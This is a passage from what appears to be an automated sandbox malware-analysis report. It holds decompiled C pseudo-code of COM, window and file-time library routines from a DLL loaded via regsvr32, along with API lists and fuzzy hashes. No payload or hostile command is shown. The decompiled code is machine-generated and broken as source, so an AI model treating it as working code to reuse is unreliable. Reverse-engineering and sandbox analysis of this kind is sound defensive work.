						_push( *( *(__esi + 0x50)));
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E10049170(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = L10030877( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E1002D5A1(__ecx);
								L32:
								__eflags =  *(_t222 + 0x10);
								_a16 = 0;
								if( *(_t222 + 0x10) > 0) {
									_t187 = 0;
									__eflags = 0;
									do {
										_t163 = E10009F14(__eflags, 0x1c);
										_a8 = _t163;
										__eflags = _t163;
										_v4 = 0;
										if(_t163 == 0) {
											_t164 = 0;
											__eflags = 0;
										} else {
											_t164 = E100222C1(_t163, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
										_t187 = _t187 + 0x28;
										__eflags = _a16 -  *(_t222 + 0x10);
									} while (__eflags < 0);
								}
								_t185 = _v16;
								__eflags = _t185;
								if(_t185 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t154 = 0xffffffdc;
										_t186 = _t185 + 0x24;
										_a16 = _a4;
										_a8 = _t154 - _v16;
										while(1) {
											_t202 =  *( *_t186 + 4);
											__eflags = _t202;
											_a4 = _t202;
											if(_t202 == 0) {
												goto L46;
											}
											while(1) {
												_t158 = E10012115( &_a4);
												_t215 =  *_t222;
												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L46;
												}
											}
											L46:
											E100221A7( *_t186);
											_t204 =  *_t186;
											__eflags = _t204;
											if(_t204 != 0) {
												 *((intOrPtr*)( *_t204 + 4))(1);
											}
											_t186 =  &(_t186[0xa]);
											_t127 =  &_a16;
											 *_t127 = _a16 - 1;
											__eflags =  *_t127;
											if( *_t127 != 0) {
												continue;
											}
											goto L49;
										}
									}
									L49:
									__imp__CoTaskMemFree(_v16);
								}
								L50:
								_t139 =  *_t225;
								goto L51;
							} else {
								_push(_t225);
								_t228 = _t232;
								_push(_t188);
								_v168 = 0x100b84e8;
								L10048E48( &_v168, 0x100afe38);
								asm("int3");
								_push(_t228);
								_t229 = _t232;
								_push(_t188);
								_v176 = 0x100b8580;
								L10048E48( &_v176, 0x100afeec);
								asm("int3");
								_push(_t229);
								_push(_t188);
								_v184 = 0x100b8618;
								L10048E48( &_v184, 0x100aff30);
								asm("int3");
								_push(4);
								E1004764D(0x1008dd26, _t181, 0, _t222);
								_t214 = E10020454(0x104);
								_v196 = _t214;
								_t179 = 0;
								_v184 = 0;
								if(_t214 != 0) {
									_t179 = E1001DB72(_t214);
								}
								return E10047725(_t179);
							}
						} else {
							__eax = 0x8007000e;
							goto L51;
						}
					}
				}
			}

0x10031021
0x10031021
0x10031022
0x10031025
0x10031029
0x10031030
0x10031033
0x1003103a
0x1003103f
0x10031044
0x1003104f
0x10031052
0x10031197
0x1003119a
0x1003119c
0x100311ab
0x100311b5
0x100311b8
0x100311ba
0x100311cb
0x100311d0
0x100311df
0x100311e2
0x100311e5
0x100311ec
0x100311ef
0x100311f6
0x100311fb
0x100311fe
0x10031205
0x1003120b
0x10031212
0x10031215
0x1003121c
0x1003121f
0x1003122c
0x1003122e
0x10031230
0x10031249
0x1003124c
0x1003124f
0x10031255
0x1003125c
0x1003125f
0x10031262
0x10031268
0x1003126b
0x1003126d
0x10031270
0x10031286
0x10031289
0x1003128c
0x1003128f
0x10031292
0x10031295
0x1003129b
0x00000000
0x10031272
0x10031272
0x10031278
0x10031278
0x00000000
0x10031232
0x10031232
0x10031238
0x1003123b
0x1003123b
0x10031230
0x1003119e
0x1003119e
0x1003119e
0x00000000
0x10031058
0x10031058
0x1003105b
0x1003105d
0x10031067
0x1003106a
0x1003106c
0x1003106f
0x1003135f
0x10031362
0x1003136a
0x1003136b
0x1003136c
0x10031372
0x10031377
0x1003137b
0x10031075
0x10031075
0x10031078
0x1003107a
0x1003107d
0x1003107e
0x10031083
0x10031086
0x10031088
0x1003108a
0x1003108d
0x10031090
0x10031091
0x10031096
0x10031099
0x1003109b
0x1003109f
0x100310a1
0x100310a3
0x100310a6
0x100310a8
0x100310ac
0x100310af
0x100310af
0x100310b7
0x100310ba
0x100310bd
0x100310c0
0x100310c0
0x100310c3
0x100310c6
0x100310c9
0x100310c9
0x100310ce
0x100310d3
0x100310d6
0x100310e4
0x100310e4
0x100310d8
0x100310db
0x100310dd
0x100310dd
0x100310e6
0x100310e9
0x100310ec
0x100310ef
0x100310f2
0x100310f5
0x100310f7
0x100310f9
0x100310fb
0x10031100
0x10031100
0x10031107
0x1003110c
0x1003110f
0x10031120
0x10031120
0x10031111
0x10031117
0x10031119
0x10031119
0x10031122
0x10031125
0x10031128
0x1003112a
0x10031131
0x10031134
0x10031137
0x1003113a
0x1003113d
0x10031140
0x10031145
0x10031148
0x10031154
0x10031158
0x1003115e
0x10031160
0x10031162
0x10031165
0x1003116a
0x10031174
0x1003117a
0x1003117f
0x10031185
0x1003118a
0x1003118d
0x1003129e
0x1003129e
0x100312a1
0x100312a4
0x100312a6
0x100312a6
0x100312a8
0x100312aa
0x100312b0
0x100312b3
0x100312b5
0x100312b8
0x100312c5
0x100312c5
0x100312ba
0x100312be
0x100312be
0x100312c7
0x100312ce
0x100312d1
0x100312d8
0x100312db
0x100312db
0x100312a8
0x100312e0
0x100312e3
0x100312e5
0x100312e7
0x100312ea
0x100312f1
0x100312f2
0x100312f8
0x100312fb
0x10031303
0x10031305
0x10031308
0x1003130a
0x1003130d
0x00000000
0x00000000
0x10031314
0x10031321
0x10031328
0x1003132f
0x10031332
0x10031335
0x00000000
0x00000000
0x10031311
0x10031337
0x10031339
0x1003133e
0x10031340
0x10031342
0x10031348
0x10031348
0x1003134b
0x1003134e
0x1003134e
0x1003134e
0x10031351
0x00000000
0x10031300
0x00000000
0x10031351
0x10031303
0x10031353
0x10031356
0x10031356
0x1003135c
0x1003135c
0x00000000
0x1003116c
0x1000a035
0x1000a036
0x1000a038
0x1000a042
0x1000a049
0x1000a04e
0x1000a04f
0x1000a050
0x1000a052
0x1000a05c
0x1000a063
0x1000a068
0x1000a069
0x1000a06c
0x1000a076
0x1000a07d
0x1000a082
0x1000a083
0x1000a08a
0x1000a099
0x1000a09b
0x1000a09e
0x1000a0a2
0x1000a0a5
0x1000a0a7
0x1000a0a7
0x1000a0b1
0x1000a0b1
0x1003114a
0x1003114a
0x00000000
0x1003114a
0x10031148
0x1003106f

APIs

__EH_prolog3.LIBCMT ref: 1003103A
CoTaskMemAlloc.OLE32(?), ref: 10031158
_memset.LIBCMT ref: 1003117A
CoTaskMemFree.OLE32(?), ref: 10031356

Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Task$AllocFreeH_prolog3_malloc_memset
String ID:
API String ID: 2459298410-0
Opcode ID: 4d3413a104903adc487147c2f6ae4262965eb4dc0bde21966797196adfeb7cfa
Instruction ID: e6cd7100d48519fc696e8c7b9946abb7a63435d6b082dadc42d981e32a129eca
Opcode Fuzzy Hash: 4d3413a104903adc487147c2f6ae4262965eb4dc0bde21966797196adfeb7cfa
Instruction Fuzzy Hash: 82C11574600609EFCB14CFA8C8849AEB7F6FF88305F24891AF916CB691DB71E945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10031EF2 Relevance: 6.2, APIs: 4, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 71%

			E10031EF2(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t99;
				intOrPtr* _t119;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t143;
				intOrPtr* _t149;
				intOrPtr* _t157;
				intOrPtr _t158;
				intOrPtr _t159;
				void* _t160;
				void* _t161;
				intOrPtr _t163;
				intOrPtr* _t164;
				void* _t165;
				intOrPtr _t177;

				_push(0x10);
				E1004764D(0x10090813, __ebx, __edi, __esi);
				_t163 = __ecx;
				 *((intOrPtr*)(_t165 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1009dfec;
				 *(_t165 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t163 + 0x24)) != 0) {
						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x1c)) + 8));
						__eflags = _t157;
						if(_t157 == 0) {
							break;
						}
						_t149 =  *_t157;
						__eflags = _t149;
						if(_t149 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t149 + 0xbc))( *((intOrPtr*)(_t157 + 8)), 0);
						 *((intOrPtr*)( *_t157 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t165 - 0x18)) = _t163 + 0x18;
					E100221A7(_t163 + 0x18);
					if( *((intOrPtr*)(_t163 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t163 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t163 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t163 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t163 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t134 =  *((intOrPtr*)(_t163 + 0x54));
							if( *((intOrPtr*)(_t163 + 0x54)) != 0) {
								L100308DE(_t134,  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x50)))));
								E1002C161( *((intOrPtr*)(_t163 + 0x54)));
							}
							_t158 =  *((intOrPtr*)(_t163 + 0x54));
							_t189 = _t158;
							if(_t158 != 0) {
								E1002C161(_t158);
								_push(_t158);
								E10009F3F(0, _t158, _t163, _t189);
							}
							_t159 =  *((intOrPtr*)(_t163 + 0x50));
							_t190 = _t159;
							if(_t159 != 0) {
								E10031CB5(_t159, _t190);
								_push(_t159);
								E10009F3F(0, _t159, _t163, _t190);
							}
							_t86 =  *((intOrPtr*)(_t163 + 0x4c));
							if(_t86 != 0) {
								_t86 =  *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t164 =  *((intOrPtr*)(_t163 + 0x48));
							if(_t164 != 0) {
								_t86 =  *((intOrPtr*)( *_t164 + 8))(_t164);
							}
							 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
							return E10047725(E100222E4(_t86, 0,  *((intOrPtr*)(_t165 - 0x18)), _t155));
						} else {
							 *((intOrPtr*)(_t165 - 0x10)) = 0;
							if( *((intOrPtr*)(_t163 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t163 + 0x14)));
								goto L32;
							}
							_t160 = 0;
							do {
								_t99 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x14)) + _t160 + 0x24)) + 4));
								 *((intOrPtr*)(_t165 - 0x14)) = _t99;
								if(_t99 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E10012115(_t165 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t165 - 0x14)) != 0);
								L28:
								E100221A7( *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x14)) + _t160 + 0x24)));
								_t143 =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x14)) + _t160 + 0x24));
								if(_t143 != 0) {
									 *((intOrPtr*)( *_t143 + 4))(1);
								}
								 *((intOrPtr*)(_t165 - 0x10)) =  *((intOrPtr*)(_t165 - 0x10)) + 1;
								_t160 = _t160 + 0x28;
							} while ( *((intOrPtr*)(_t165 - 0x10)) <  *((intOrPtr*)(_t163 + 0x10)));
							goto L31;
						}
					}
					_t161 = 0;
					if( *((intOrPtr*)(_t163 + 0x38)) <= 0) {
						L17:
						if(_t177 != 0) {
							_push( *((intOrPtr*)(_t163 + 0x3c)));
							E10009F3F(0, _t161, _t163, _t177);
							_push( *((intOrPtr*)(_t163 + 0x40)));
							E10009F3F(0, _t161, _t163, _t177);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t165 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t163 + 0x40)) +  *((intOrPtr*)(_t165 - 0x10)));
						 *((intOrPtr*)(_t165 - 0x10)) =  *((intOrPtr*)(_t165 - 0x10)) + 0x10;
						_t161 = _t161 + 1;
					} while (_t161 <  *((intOrPtr*)(_t163 + 0x38)));
					_t177 =  *((intOrPtr*)(_t163 + 0x38));
					goto L17;
				}
				_t119 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t119 == 0) {
					goto L11;
				}
				_t120 =  *_t119;
				_t155 = _t165 - 0x14;
				_push(_t165 - 0x14);
				_push(0x100a611c);
				_push(_t120);
				if( *((intOrPtr*)( *_t120))() < 0) {
					goto L11;
				}
				_t122 =  *((intOrPtr*)(_t165 - 0x14));
				if(_t122 == 0) {
					goto L11;
				}
				_t155 = _t165 - 0x10;
				_push(_t165 - 0x10);
				_push(0x100a628c);
				 *((intOrPtr*)(_t165 - 0x10)) = 0;
				_push(_t122);
				if( *((intOrPtr*)( *_t122 + 0x10))() >= 0) {
					_t126 =  *((intOrPtr*)(_t165 - 0x10));
					if(_t126 != 0) {
						 *((intOrPtr*)( *_t126 + 0x18))(_t126,  *((intOrPtr*)(__ecx + 0x58)));
						_t128 =  *((intOrPtr*)(_t165 - 0x10));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
					}
				}
				_t124 =  *((intOrPtr*)(_t165 - 0x14));
				 *((intOrPtr*)( *_t124 + 8))(_t124);
				goto L11;
			}

0x10031ef2
0x10031ef9
0x10031efe
0x10031f00
0x10031f03
0x10031f0e
0x10031f11
0x00000000
0x10031f97
0x10031f76
0x10031f79
0x10031f7b
0x00000000
0x00000000
0x10031f7d
0x10031f7f
0x10031f81
0x00000000
0x00000000
0x10031f89
0x10031f91
0x10031f91
0x10031f9f
0x10031fa2
0x10031faa
0x10031fe4
0x10031fe4
0x10031fe9
0x10031fee
0x10031fee
0x10031ff1
0x10031ff6
0x10031ffb
0x10031ffb
0x10032001
0x10032070
0x10032070
0x10032075
0x10032078
0x10032078
0x1003207e
0x10032083
0x1003208a
0x10032092
0x10032092
0x10032097
0x1003209a
0x1003209c
0x100320a0
0x100320a5
0x100320a6
0x100320ab
0x100320ac
0x100320af
0x100320b1
0x100320b5
0x100320ba
0x100320bb
0x100320c0
0x100320c1
0x100320c6
0x100320cb
0x100320cb
0x100320ce
0x100320d3
0x100320d8
0x100320d8
0x100320de
0x100320ec
0x10032003
0x10032006
0x10032009
0x10032067
0x1003206a
0x00000000
0x1003206a
0x1003200b
0x1003200d
0x10032014
0x10032019
0x1003201c
0x00000000
0x00000000
0x00000000
0x00000000
0x1003201e
0x1003201e
0x10032033
0x10032033
0x1003203b
0x10032042
0x1003204a
0x10032050
0x10032056
0x10032056
0x10032059
0x1003205f
0x10032062
0x00000000
0x1003200d
0x10032001
0x10031fac
0x10031fb1
0x10031fd0
0x10031fd0
0x10031fd2
0x10031fd5
0x10031fda
0x10031fdd
0x10031fe3
0x00000000
0x10031fd0
0x10031fb3
0x10031fb6
0x10031fbd
0x10031fc3
0x10031fc7
0x10031fc8
0x10031fcd
0x00000000
0x10031fcd
0x10031f17
0x10031f1c
0x00000000
0x00000000
0x10031f1e
0x10031f22
0x10031f25
0x10031f26
0x10031f2b
0x10031f30
0x00000000
0x00000000
0x10031f32
0x10031f37
0x00000000
0x00000000
0x10031f39
0x10031f3c
0x10031f3d
0x10031f42
0x10031f47
0x10031f4d
0x10031f4f
0x10031f54
0x10031f5c
0x10031f5f
0x10031f65
0x10031f65
0x10031f54
0x10031f68
0x10031f6e
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 10031EF9
VariantClear.OLEAUT32(?), ref: 10031FBD
CoTaskMemFree.OLE32(?), ref: 1003206A
CoTaskMemFree.OLE32(?), ref: 10032078

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeTask$ClearH_prolog3Variant
String ID:
API String ID: 365290523-0
Opcode ID: 046a668e55c1f63bfc0c45771c6a21394a789379807011230d761d187dd6bb23
Instruction ID: ef22d29e0bef1ac74d406dcde40b1b674f69a89cf3a88a689f20e72bee2d93af
Opcode Fuzzy Hash: 046a668e55c1f63bfc0c45771c6a21394a789379807011230d761d187dd6bb23
Instruction Fuzzy Hash: 26714675A006429FCB65DFA4C8C496AB7F2FF48305B61096CE146DB662CB31FC85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10031B00 Relevance: 6.2, APIs: 4, Instructions: 173
windowCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E10031B00(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t63;
				signed int _t64;
				intOrPtr _t70;
				signed int _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed int _t88;
				signed int _t92;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t126;
				intOrPtr _t127;
				void* _t144;
				void* _t147;
				intOrPtr* _t148;
				signed int** _t150;
				signed int* _t151;
				signed int _t154;
				signed int _t156;
				void* _t158;
				void* _t161;

				_t144 = __edx;
				_t126 = __ecx;
				_t158 = _t161;
				_t154 = __ecx;
				_t63 =  *((intOrPtr*)(__ecx + 4));
				_push(_t147);
				if(_t63 != 0) {
					_t64 =  *(_t63 + 0x28);
					__eflags = _t64;
					if(_t64 == 0) {
						goto L4;
					} else {
						_t126 = _t64;
						_t72 = E10015912(0, _t126, _t147);
						__eflags = _t72;
						_v8 = _t72;
						if(_t72 == 0) {
							goto L4;
						} else {
							_t73 = IsWindowVisible( *(_t72 + 0x20));
							asm("sbb eax, eax");
							_t75 =  ~_t73 + 1;
							__eflags = _t75;
							_v24 = _t75;
							if(_t75 != 0) {
								GetWindowRect( *(E10013FEA(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t144;
								E100178FF(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
								E1001793D(_v8, 1);
							}
							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
							_t148 = _t154 + 0x48;
							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x1009df80, _t148);
							__eflags = _t78;
							if(_t78 < 0) {
								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x1009dfd8,  &_v16);
								__eflags = _t81;
								if(_t81 >= 0) {
									_t82 = _v16;
									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
									_t84 = _v16;
									 *((intOrPtr*)( *_t84 + 8))(_t84);
									_t86 = _v20;
									__eflags = _t86;
									if(_t86 != 0) {
										_t150 = _t154 + 8;
										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x100a428c, _t150);
										_t88 = _v20;
										 *((intOrPtr*)( *_t88 + 8))(_t88);
										_t81 = _v12;
										__eflags = _t81;
										if(__eflags >= 0) {
											_t151 =  *_t150;
											 *( *_t151)(_t151, 0x100a426c, _t154 + 0xc);
											goto L21;
										}
									} else {
										_t81 = 0x80004005;
									}
								}
							} else {
								_t99 =  *_t148;
								_t151 = _t154 + 0x4c;
								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x100a61dc, _t151);
								__eflags =  *_t151;
								_v12 = _t100;
								if( *_t151 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L21:
									_t92 = E10031021(0, _t154, _t151, _t154, __eflags);
									__eflags = _v24;
									_t156 = _t92;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E100178FF(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1001793D(_v8, 0);
									}
									_t81 = _t156;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E100178FF(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1001793D(_v8, 0);
									}
									_t81 = _v12;
								}
							}
							return _t81;
						}
					}
				} else {
					L4:
					_push(_t158);
					_push(_t126);
					_v76 = 0x100b8618;
					L10048E48( &_v76, 0x100aff30);
					asm("int3");
					_push(4);
					E1004764D(0x1008dd26, 0, _t147, _t154);
					_t127 = E10020454(0x104);
					_v88 = _t127;
					_t70 = 0;
					_v76 = 0;
					if(_t127 != 0) {
						_t70 = E1001DB72(_t127);
					}
					return E10047725(_t70);
				}
			}

0x10031b00
0x10031b00
0x10031b01
0x10031b08
0x10031b0a
0x10031b11
0x10031b12
0x10031b19
0x10031b1c
0x10031b1e
0x00000000
0x10031b20
0x10031b20
0x10031b22
0x10031b27
0x10031b29
0x10031b2c
0x00000000
0x10031b2e
0x10031b31
0x10031b39
0x10031b3b
0x10031b3b
0x10031b3c
0x10031b3f
0x10031b5a
0x10031b66
0x10031b71
0x10031b80
0x10031b81
0x10031b86
0x10031b90
0x10031b90
0x10031b98
0x10031b9d
0x10031ba7
0x10031ba9
0x10031bab
0x10031c0c
0x10031c1b
0x10031c1d
0x10031c1f
0x10031c25
0x10031c2f
0x10031c32
0x10031c38
0x10031c3b
0x10031c3e
0x10031c40
0x10031c4b
0x10031c57
0x10031c5a
0x10031c60
0x10031c63
0x10031c66
0x10031c68
0x10031c6a
0x10031c78
0x00000000
0x10031c78
0x10031c42
0x10031c42
0x10031c42
0x10031c40
0x10031bad
0x10031bad
0x10031bb1
0x10031bbc
0x10031bbf
0x10031bc1
0x10031bc4
0x10031bc6
0x10031bc6
0x10031bcd
0x10031bd0
0x10031c7a
0x10031c7c
0x10031c81
0x10031c84
0x10031c86
0x10031c96
0x10031ca0
0x10031ca9
0x10031ca9
0x10031cae
0x10031bd6
0x10031bd6
0x10031bd9
0x10031be9
0x10031bf3
0x10031bfc
0x10031bfc
0x10031c01
0x10031c01
0x10031bd0
0x10031cb4
0x10031cb4
0x10031b2c
0x10031b14
0x10031b14
0x1000a069
0x1000a06c
0x1000a076
0x1000a07d
0x1000a082
0x1000a083
0x1000a08a
0x1000a099
0x1000a09b
0x1000a09e
0x1000a0a2
0x1000a0a5
0x1000a0a7
0x1000a0a7
0x1000a0b1
0x1000a0b1

APIs

IsWindowVisible.USER32(?), ref: 10031B31
GetDesktopWindow.USER32 ref: 10031B41
GetWindowRect.USER32 ref: 10031B5A
GetWindowRect.USER32 ref: 10031B66

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$DesktopVisible
String ID:
API String ID: 1055025324-0
Opcode ID: 796ccccd26661263c6126ba4b3792ed7bc094707f154db6d2883937cb8b05c28
Instruction ID: b37612f4069db3000d5051cf8fcec6d766bd154b7c31607ea0a7e8fdfd1e8d3f
Opcode Fuzzy Hash: 796ccccd26661263c6126ba4b3792ed7bc094707f154db6d2883937cb8b05c28
Instruction Fuzzy Hash: F051C675A0010AEFCB05DFA8C994CEEB7B9FF48245B1145A9F606EB261DB31ED41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1003926B Relevance: 6.1, APIs: 4, Instructions: 132
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1003926B(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t85 = __ecx;
				_t102 = _a4;
				_t100 = __ecx;
				E10049170(__ecx, _t102, 0, 0x128);
				E1000A0B7(0, _t85, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x1009db74; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(L10038C62( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = L10038D98(0,  &_v36, _t101,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
